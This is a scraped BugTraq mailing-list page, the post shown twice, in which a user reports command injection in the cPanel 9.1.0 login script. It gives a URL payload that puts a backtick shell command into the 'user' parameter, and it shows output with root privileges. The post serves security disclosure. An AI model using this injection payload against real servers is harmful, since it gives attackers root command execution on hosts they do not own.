BugTraq
Back to list
Name:
Email:
*Note: Email address will appear as "user domain ext" to prevent harvesting.
Subject:
Message:
Cpanel 9.1.0 have a problem ?
Mar 12 2004 06:00PM
Arab VieruZ (arabviersus hotmail com)
Hi all
I found another problem in login script
http://www.xxx.com:2082/login/?user=|"`id`"|
it same the first it give ROOT & u can use "+" or "%20" without any problem :) ! lool
look @ this:
/*
sh: /var/cpanel/users/: is a directory sh: uid=0(root) gid=0(root)
groups=0(root),1(...
[ more ]
Privacy Statement
Copyright 2010, SecurityFocus
Hi all
I found another problem in login script
http://www.xxx.com:2082/login/?user=|"`id`"|
it same the first it give ROOT & u can use "+" or "%20" without any problem :) ! lool
look @ this:
/*
sh: /var/cpanel/users/: is a directory sh: uid=0(root) gid=0(root)
groups=0(root),1(...
[ more ]